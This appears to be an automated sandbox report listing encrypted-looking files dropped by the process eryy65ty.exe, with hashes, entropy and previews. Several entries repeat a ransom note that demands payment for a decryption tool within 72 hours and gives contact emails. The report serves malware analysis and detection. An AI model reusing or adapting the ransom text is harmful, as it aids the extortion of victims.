                                                                                                                                            Preview:F#%.N.!.U.q.WCO5..v..O.Y.......a.h../tX..<[...\P.U\.y#!..P..|..Mu%._|.J)d.+f3...>..Z....q9.H...p..?..u[1@'X...u..W.......(.4&....X8..}dHJr..n..9B}.&..5..0..u.U..=...m.X.c.{ .VB.k.pt..Y....X.)YD...U..V....aj..v.c.}..s....6.}..>.=)..h|.V..u.._SJ%.....[....j.......3?[.5.E.VO^N..E.J.._.........=.r.C.?$..+ul....{z....n...S.eJ.m...r.g.......\.2.2..s.MW..y.!......K*.q.?3%....."z.z?bC....\..._..AA..{.k..t .....>.n.....}J;Y...;....3.H..V...9..u...1....[1.`.P....A.'=..b.....y...E...i._:.y.Z...{..#k...=....8K.[...''._..>.B}...a.z.?.jJ....&.m..M....kC..1..P.g9..U/E2..I.W.....g..&...Tm...7...6..I.N&....*.1..azt......n.....y&I.F......9.U;........3E..,r.N.. ..}.~....`.k...29.vO.........c.,.Bq.@j.N.g..a8.J).V.S$.m.y.......M..!~.~.F......@....<y`...dd........+.......Y.#&V.>.....;k,.o.=S./.b6..cG..J3.../.....[.W...'t..7...?3{.\...=Zt..0{.L.91$./..a.Y....o...f.E.Q.Mw.u.|......Q..U*.E-..f...[.;.Z!j.......`..t&X.!...8.......QX.Q.p.....|....Z.-..k6,.}.l.
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.871377806108299
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:ivxRcA4avzsMHlGdxpvMB4qtMHA9EMmVyAJCBCaaspCvlIs0tPI1XJxjcC:U2Zav4ruMHKOVXCBCafCvFd/jcC
                                                                                                                                            MD5:DBA8858D24A823917DE012A2CC203A17
                                                                                                                                            SHA1:F74DCB9D84D84EB8B7F425AE33D01DEBCF3A65EE
                                                                                                                                            SHA-256:CBD94D6EA3ACAA4E6F1BA4F9BA4224C40F097A8D230E2E65C0F4EEB72D5C8534
                                                                                                                                            SHA-512:7A3703C8A9916DF3B0B819AEA7BFECB4EAA9DC38486B721A7710CAB733C1BE35082F2D1E97B749E74DEE200DC40F105ECB37C0101AE3397CD91F89C6F758F738
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:..........2.3*.._...Aj..((.......D.;.'.q......B.y.....T....a...F.*.4..u..]..b.%...\...,..N..Xr.....Q..._...i...U|.....#....i..]............6.N.........#A.K0.F...e..`../....-..R..S.:Y..f)4.BX.......H..."SU....^.b.t.l.V&..}..f63Jd2...D..+..r.....R.6...&..ON...\...`^.......X.Z.z4.........r...3.{s$....._.6...v..1'.v>7.....c...P...Cb.....4..v..fT+.7....}./.x.r...H....H.u.'....o...m."...7C.Y.......}V..?U.&..Q..W.v:.@.A.0....KxG.i..+...V...-....cQU9.l..%.EV.p...Z.P....(.......F.V...QY. .P......k.IMGl.V+.D.d-..;a..U..6LT./....4..k.".m ..].R>.....3.~..q..._.P2....s.W.W....2...|..).q...9..w.ZP...t....bJ.C[......h..M|.o..8.!...B1.oTBt.5...a9.z.`.C.'%.c.......`..<.........=QA....]<l.3..#.`_%...IHE.;?.A.n.w6.(d6...<F..5".Z..G....b..d.c6...R.2.}....3......d|.z.y.jq...0b....{........YH....kI........./.. ..../..."|.r..V.xFPl..`.(*V.l.....w.B........y[..0d..%...w..|^O...{.Kkc...O......@%...h...@.^...|....R...B..c..M>>F.>.....2..1$y5..k.p...f....E..5D*'hH......
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.871377806108299
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:ivxRcA4avzsMHlGdxpvMB4qtMHA9EMmVyAJCBCaaspCvlIs0tPI1XJxjcC:U2Zav4ruMHKOVXCBCafCvFd/jcC
                                                                                                                                            MD5:DBA8858D24A823917DE012A2CC203A17
                                                                                                                                            SHA1:F74DCB9D84D84EB8B7F425AE33D01DEBCF3A65EE
                                                                                                                                            SHA-256:CBD94D6EA3ACAA4E6F1BA4F9BA4224C40F097A8D230E2E65C0F4EEB72D5C8534
                                                                                                                                            SHA-512:7A3703C8A9916DF3B0B819AEA7BFECB4EAA9DC38486B721A7710CAB733C1BE35082F2D1E97B749E74DEE200DC40F105ECB37C0101AE3397CD91F89C6F758F738
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:..........2.3*.._...Aj..((.......D.;.'.q......B.y.....T....a...F.*.4..u..]..b.%...\...,..N..Xr.....Q..._...i...U|.....#....i..]............6.N.........#A.K0.F...e..`../....-..R..S.:Y..f)4.BX.......H..."SU....^.b.t.l.V&..}..f63Jd2...D..+..r.....R.6...&..ON...\...`^.......X.Z.z4.........r...3.{s$....._.6...v..1'.v>7.....c...P...Cb.....4..v..fT+.7....}./.x.r...H....H.u.'....o...m."...7C.Y.......}V..?U.&..Q..W.v:.@.A.0....KxG.i..+...V...-....cQU9.l..%.EV.p...Z.P....(.......F.V...QY. .P......k.IMGl.V+.D.d-..;a..U..6LT./....4..k.".m ..].R>.....3.~..q..._.P2....s.W.W....2...|..).q...9..w.ZP...t....bJ.C[......h..M|.o..8.!...B1.oTBt.5...a9.z.`.C.'%.c.......`..<.........=QA....]<l.3..#.`_%...IHE.;?.A.n.w6.(d6...<F..5".Z..G....b..d.c6...R.2.}....3......d|.z.y.jq...0b....{........YH....kI........./.. ..../..."|.r..V.xFPl..`.(*V.l.....w.B........y[..0d..%...w..|^O...{.Kkc...O......@%...h...@.^...|....R...B..c..M>>F.>.....2..1$y5..k.p...f....E..5D*'hH......
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.830885112407745
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:xE+Xkp/gi2RXzBuSnvmwQStHupeds9hZTxCynO2Auo9dtcJ8Dry7AGJa7lTDd+:epCjRnuwtHmeds9hZVCKhontcsGJa7pE
                                                                                                                                            MD5:1D11CD71C33ED9EFFA19E1AF85FBFDF3
                                                                                                                                            SHA1:B7434425876B8DB734630A4C80B28D750AE6734E
                                                                                                                                            SHA-256:FCFB31D96BB1212B50B271D31B5321261BFA2EAAB6702AE2364C7710DF72F234
                                                                                                                                            SHA-512:30B7755EE69F902624F24035D5FC3BF33261A383118706AB179647E99114B79C4D44CC4921AA5BF01C3FB704DF771AE45DFBEA96FB34094C36BC0719D684AB1C
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......*.....2_.1^.....Z]...E.T8.,L[....-.f..&E`J..L..E.J];....=6....$TCF...F..I.\...P<.g....hLb.k..w.%.Y......&.u....6..z..).y....jk.p.Itd......=j.vq^b.!-=.%..a.[5..$.b*..I.........V^.]^z..U....L.d..........vJ..K.r..T.#.....w.Z...O.Tlt. .0.</.M7.74.^.n.....&...o.<?D*......T.V..wz{.n&.......+:.0..f.$..3.U...}..V..{...ok.')..k2.G.R.n..b.f..).yAv...8.?._.......y......z...?...Z.e.%....w.t..2*'.~.w5.TC..e$2._...p....@x.0(.x........j....8...P.....I3I..`.&%.S...I...D.....0YGnx;.....yE..TXs)S.^.(....vf6I..=9.<*....*....Y..BO..r4|.._4"..*.^~.....1......T.$d...@....b.......~*......d./...r$.i...2k.1..+....i.h..?.2..M..N...zu../....r.W*....GPA....mw......0..l.....}..*.,...z.N-\.....3...B....f.....J.}4...'....`...LP.....qv=.gP.2....A.g....!..0..| =...L.`a..~.{..s;N.0Z...Z..AS..FDDx;r66"..zV.D....].5...)v.P....._......mZ#...-.k.@l..2..j.l.M...].R.$....x.Hm.\.k .X...bw....r.u13z......e...@|..9..ws.*.c.B.'......1....Hz+..._9u.a...*.....&.._....@F
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.830885112407745
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:xE+Xkp/gi2RXzBuSnvmwQStHupeds9hZTxCynO2Auo9dtcJ8Dry7AGJa7lTDd+:epCjRnuwtHmeds9hZVCKhontcsGJa7pE
                                                                                                                                            MD5:1D11CD71C33ED9EFFA19E1AF85FBFDF3
                                                                                                                                            SHA1:B7434425876B8DB734630A4C80B28D750AE6734E
                                                                                                                                            SHA-256:FCFB31D96BB1212B50B271D31B5321261BFA2EAAB6702AE2364C7710DF72F234
                                                                                                                                            SHA-512:30B7755EE69F902624F24035D5FC3BF33261A383118706AB179647E99114B79C4D44CC4921AA5BF01C3FB704DF771AE45DFBEA96FB34094C36BC0719D684AB1C
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......*.....2_.1^.....Z]...E.T8.,L[....-.f..&E`J..L..E.J];....=6....$TCF...F..I.\...P<.g....hLb.k..w.%.Y......&.u....6..z..).y....jk.p.Itd......=j.vq^b.!-=.%..a.[5..$.b*..I.........V^.]^z..U....L.d..........vJ..K.r..T.#.....w.Z...O.Tlt. .0.</.M7.74.^.n.....&...o.<?D*......T.V..wz{.n&.......+:.0..f.$..3.U...}..V..{...ok.')..k2.G.R.n..b.f..).yAv...8.?._.......y......z...?...Z.e.%....w.t..2*'.~.w5.TC..e$2._...p....@x.0(.x........j....8...P.....I3I..`.&%.S...I...D.....0YGnx;.....yE..TXs)S.^.(....vf6I..=9.<*....*....Y..BO..r4|.._4"..*.^~.....1......T.$d...@....b.......~*......d./...r$.i...2k.1..+....i.h..?.2..M..N...zu../....r.W*....GPA....mw......0..l.....}..*.,...z.N-\.....3...B....f.....J.}4...'....`...LP.....qv=.gP.2....A.g....!..0..| =...L.`a..~.{..s;N.0Z...Z..AS..FDDx;r66"..zV.D....].5...)v.P....._......mZ#...-.k.@l..2..j.l.M...].R.$....x.Hm.\.k .X...bw....r.u13z......e...@|..9..ws.*.c.B.'......1....Hz+..._9u.a...*.....&.._....@F
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.818954675576569
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:xT++X/29lgvlSOY5EJtXFWh1e63P4kG3Ebz25QZ0oHilakCI3+l:xfXelKPYKJ5FAA6ge56QzIOl
                                                                                                                                            MD5:5384F8F77AACBF4568A6DC658BAD8EBE
                                                                                                                                            SHA1:6FF271B038E6BAB29C51A22AD389873989256456
                                                                                                                                            SHA-256:BCE258C89A1240CF7D50989B2B1AFAAD7E28011FDA27A60744C12415CAFBB4C1
                                                                                                                                            SHA-512:DC6D1688D8A7853BF95C07B2178687C152168F65FC2EBE7DFDBBC59DEF3276C2F5FC58F9270770BCEE7FE9E35D5F4EE702DC6B11F126C9C1D5D726873FE9B358
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:R...wG.m...#.n..PV...Ph..9EA.%.F............=..&Z..<.|n.b.........y....;.O$....H.AQ...0Po.N=s.Vz....Jfb.....h..KVa..b.5a....*..d.tYR....+.)....g.i..!........pwN..V.E...u9..h.S.6.Ui..P..G.R..3_..fLp'...a]&xWd#..._oc..Y..+..=...jXk.8(82j~..2...@....b.SO.Q(.~...gXo]!..`.rB.4Q.%o.m..?...!.o.@Bv.p...V..._.fyq...e."b..!....U.ZTJ....V.ze(K.b......he.....|{..vt...X.$&...Ur@......O.kz;...x...QA..-...;v..<T6X.z.=.u.._L......E.V.fF.c....".v....x$.@.c.d..e..'..o`r...1..7."u.".Cr$.*...4...6..K.@.5<.U..m.X..]......-o6.x.DnO.rZ...?.._...t...<n....]<....^0..s.}...'.d.C.d.....\Z..D..?P.A=..<7.).f....[. ..Cz....~...k.ku.....D... .F.t(7......1.e...p.&V".$.P...6!e...P.i....a.e6=.o_}?.D..&....\;m..[..%.W'7.......[.F..b.]%..;.s.~..&.!..y......b......V[.:......m7.#..'.....w.....M..n3..P.i3.K+.a...U.u..NfH.KU.IA...2B44.U...;..`.=7.Ci.(.....o...q.....vw..:....93.....Gl.1g.k65..0.....!..}.....M..=C.......hp....!>............a.,K.$.DlX.-..........DR.>..... .h..'
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.818954675576569
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:xT++X/29lgvlSOY5EJtXFWh1e63P4kG3Ebz25QZ0oHilakCI3+l:xfXelKPYKJ5FAA6ge56QzIOl
                                                                                                                                            MD5:5384F8F77AACBF4568A6DC658BAD8EBE
                                                                                                                                            SHA1:6FF271B038E6BAB29C51A22AD389873989256456
                                                                                                                                            SHA-256:BCE258C89A1240CF7D50989B2B1AFAAD7E28011FDA27A60744C12415CAFBB4C1
                                                                                                                                            SHA-512:DC6D1688D8A7853BF95C07B2178687C152168F65FC2EBE7DFDBBC59DEF3276C2F5FC58F9270770BCEE7FE9E35D5F4EE702DC6B11F126C9C1D5D726873FE9B358
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:R...wG.m...#.n..PV...Ph..9EA.%.F............=..&Z..<.|n.b.........y....;.O$....H.AQ...0Po.N=s.Vz....Jfb.....h..KVa..b.5a....*..d.tYR....+.)....g.i..!........pwN..V.E...u9..h.S.6.Ui..P..G.R..3_..fLp'...a]&xWd#..._oc..Y..+..=...jXk.8(82j~..2...@....b.SO.Q(.~...gXo]!..`.rB.4Q.%o.m..?...!.o.@Bv.p...V..._.fyq...e."b..!....U.ZTJ....V.ze(K.b......he.....|{..vt...X.$&...Ur@......O.kz;...x...QA..-...;v..<T6X.z.=.u.._L......E.V.fF.c....".v....x$.@.c.d..e..'..o`r...1..7."u.".Cr$.*...4...6..K.@.5<.U..m.X..]......-o6.x.DnO.rZ...?.._...t...<n....]<....^0..s.}...'.d.C.d.....\Z..D..?P.A=..<7.).f....[. ..Cz....~...k.ku.....D... .F.t(7......1.e...p.&V".$.P...6!e...P.i....a.e6=.o_}?.D..&....\;m..[..%.W'7.......[.F..b.]%..;.s.~..&.!..y......b......V[.:......m7.#..'.....w.....M..n3..P.i3.K+.a...U.u..NfH.KU.IA...2B44.U...;..`.=7.Ci.(.....o...q.....vw..:....93.....Gl.1g.k65..0.....!..}.....M..=C.......hp....!>............a.,K.$.DlX.-..........DR.>..... .h..'
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.859087083555596
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:Dc4E/KJRXOiCtudvmEV7+kj/z7NVV/KS6jo9KzJzNFxgvUsY7RIl5:YfyJR+V800+O/PV/KsszJJFxgvGa5
                                                                                                                                            MD5:A3F9FEFFCA49174657BFF8A512416736
                                                                                                                                            SHA1:817C99C16F0DAA1D142B33AEDE57E21EA665A96B
                                                                                                                                            SHA-256:D85EDDC5FB546E4984E56CEEBAD96C9CD844591C0F5B729BCD1D5B56A1946B2C
                                                                                                                                            SHA-512:9336123F5C9444CB8CE28401454A2A1F5165718B70FC996DA596BDB51521A6C62173E7996AAA55752C802961E41825D41D9F2952D2CA6A7C7C49DB64A6FD10BC
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.5....R.9.gn....=Bp.[...i...EC..,#.e..TG...:..S...1;2.9...J?s...p.z.L+C2.N..oK.......QP.d..^.........Kj.:V.>".....{.........G.....T 98...0B...my..3.a..-..i......j.x.?....[v.sy.z.:....>.x..T..2.p....^%xE.%E.,.R..'.u..r.qOu&<A'K..9...H4b.....U.i?.8......|...wqZ.xS.'0..`{;..c.S.+Bv...$*.......bKB`...N.uO.....4n.i.Q.yZu\.....*(%.._..u..+..966.L...f..t.....@hH...7Xq.9A.r..3(r.Zfn.m...iy`....Xt.[.6....:(.`....H.I.7k.VZ.....r....@.......5Y.!. ^.@[...[.g.....,......?.LE.$.e..\._<B..f.w.H<.$......... .P..jO9...$,5ec.c.P......W....IkrU^........S... 4V;......e.8.skq=...6.9On5.Y.(..OZ{.....)?..]o.......'.g.`....o.,l....>..).......[~.2...........d.D..1......._.....^~7.;..(p.....Y..g.gXa...R.0....\.Y. .\... ..rh..m..8.0..P.9..8-.t.A...N......x7B......Z...o........W.d..!..R..^..3E..+../....B>i.=...mj9...~kO.{......1U..J.....e*.t[.u.t.."........l..*~..h...i...Nx........(...zN...9.i.....<...Q1.Le..R....M.:!H.......u.zYC.{.jn.emG..b.G.re1..:.7.......j.
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.859087083555596
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:Dc4E/KJRXOiCtudvmEV7+kj/z7NVV/KS6jo9KzJzNFxgvUsY7RIl5:YfyJR+V800+O/PV/KsszJJFxgvGa5
                                                                                                                                            MD5:A3F9FEFFCA49174657BFF8A512416736
                                                                                                                                            SHA1:817C99C16F0DAA1D142B33AEDE57E21EA665A96B
                                                                                                                                            SHA-256:D85EDDC5FB546E4984E56CEEBAD96C9CD844591C0F5B729BCD1D5B56A1946B2C
                                                                                                                                            SHA-512:9336123F5C9444CB8CE28401454A2A1F5165718B70FC996DA596BDB51521A6C62173E7996AAA55752C802961E41825D41D9F2952D2CA6A7C7C49DB64A6FD10BC
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.5....R.9.gn....=Bp.[...i...EC..,#.e..TG...:..S...1;2.9...J?s...p.z.L+C2.N..oK.......QP.d..^.........Kj.:V.>".....{.........G.....T 98...0B...my..3.a..-..i......j.x.?....[v.sy.z.:....>.x..T..2.p....^%xE.%E.,.R..'.u..r.qOu&<A'K..9...H4b.....U.i?.8......|...wqZ.xS.'0..`{;..c.S.+Bv...$*.......bKB`...N.uO.....4n.i.Q.yZu\.....*(%.._..u..+..966.L...f..t.....@hH...7Xq.9A.r..3(r.Zfn.m...iy`....Xt.[.6....:(.`....H.I.7k.VZ.....r....@.......5Y.!. ^.@[...[.g.....,......?.LE.$.e..\._<B..f.w.H<.$......... .P..jO9...$,5ec.c.P......W....IkrU^........S... 4V;......e.8.skq=...6.9On5.Y.(..OZ{.....)?..]o.......'.g.`....o.,l....>..).......[~.2...........d.D..1......._.....^~7.;..(p.....Y..g.gXa...R.0....\.Y. .\... ..rh..m..8.0..P.9..8-.t.A...N......x7B......Z...o........W.d..!..R..^..3E..+../....B>i.=...mj9...~kO.{......1U..J.....e*.t[.u.t.."........l..*~..h...i...Nx........(...zN...9.i.....<...Q1.Le..R....M.:!H.......u.zYC.{.jn.emG..b.G.re1..:.7.......j.
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.86387055530056
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:ZuKsQCxxXiY1iHd5Q1F2RvxnFTbPlwOppFIpTE8OFCe1NFHRDAYo3xBi8:ZuJQCxliYoHIInF/PlB/FIpTE8OUgdkP
                                                                                                                                            MD5:30EABAEAC5F8B154D6F5EF7758310EC9
                                                                                                                                            SHA1:25C76782075CB5BD681FB59386E85699D2C6CD83
                                                                                                                                            SHA-256:AD801636CC3A118C32B0B7FEB8F33D10B48BCF4F0E377C494B2E73959C05A1A6
                                                                                                                                            SHA-512:97A6364CCA8E121A988ACB8FFF57AF63C4051780A372ED21F8081D53E451D1FA241E612849272E60D4F26AF81B2B6353FC57007AB6332E1C08FD2B4DE6C4802F
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:y.mk....cC..[5...|..Xwi.X.@E`. ..U....._9.....U.g...../.".m......{.....Tiy7..X..g.ow....%.._.O)4H......KG.@%...;..@..L.....t..xY..y.|n.@....B.I..,......j.f]5...A?HX...f...10.....'...>_.m...fo.PC....g9.e.p.;..CR.....6.w.$.J@.Mm...\`.^.....@...n.-2.......b..3..Q`...d3VmC....+w..~.}eh.A.H.-.......% ..1..Ta...X3..4.....7D.B..V....l.R.....a.;.O.7V..?tO..J<.bnx.e>..`.A.m..a....S.)k......-//.r$.lj..E(.vd..e......y......I@.1.e...`sG.6.0{..o..B....?..v..v;'g..^3,....Y.....@.r%".E..'.D.R..s..u.z...C..Z.B...9v...X.....q.....k.P.......Us.....z3.....6.)...6..v.........i.r.l...y*[/..d{..t..zbg.p.}.N...,E.]b.Rw...-*Y nB..FI...-...]...\.G...c.$..8....!^.Q.+..g.,R...7.b.&g....0..y...N.N.r.!..\...b...O....9.........e............kR..Z;(*...FK?7...x .0.,&+W.d..~.(.......%u+.....uH.+f.e.]9..%..%..a.+Rg..e../..Q.NL........M..6&Y$.q...-..V.r.....C._..g....0..._D/go.mJT1}.}C.x9.*zO.......dy....}F...v3.....A.....:.4..[.......uI.ZV3.'EQ.u.1..2T.8$.|..p.OC
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.86387055530056
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:ZuKsQCxxXiY1iHd5Q1F2RvxnFTbPlwOppFIpTE8OFCe1NFHRDAYo3xBi8:ZuJQCxliYoHIInF/PlB/FIpTE8OUgdkP
                                                                                                                                            MD5:30EABAEAC5F8B154D6F5EF7758310EC9
                                                                                                                                            SHA1:25C76782075CB5BD681FB59386E85699D2C6CD83
                                                                                                                                            SHA-256:AD801636CC3A118C32B0B7FEB8F33D10B48BCF4F0E377C494B2E73959C05A1A6
